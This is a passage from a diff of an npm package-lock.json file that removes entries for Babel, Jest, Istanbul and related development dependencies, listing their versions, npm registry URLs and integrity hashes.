"7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", - "dev": true, - "requires": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - } - }, - "@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - } - }, - "@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - } - }, - "@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "requires": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - } - }, - "@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3" - } - }, - "@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - } - }, - "@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - }, - "dependencies": { - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - } - } - }, - "@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": 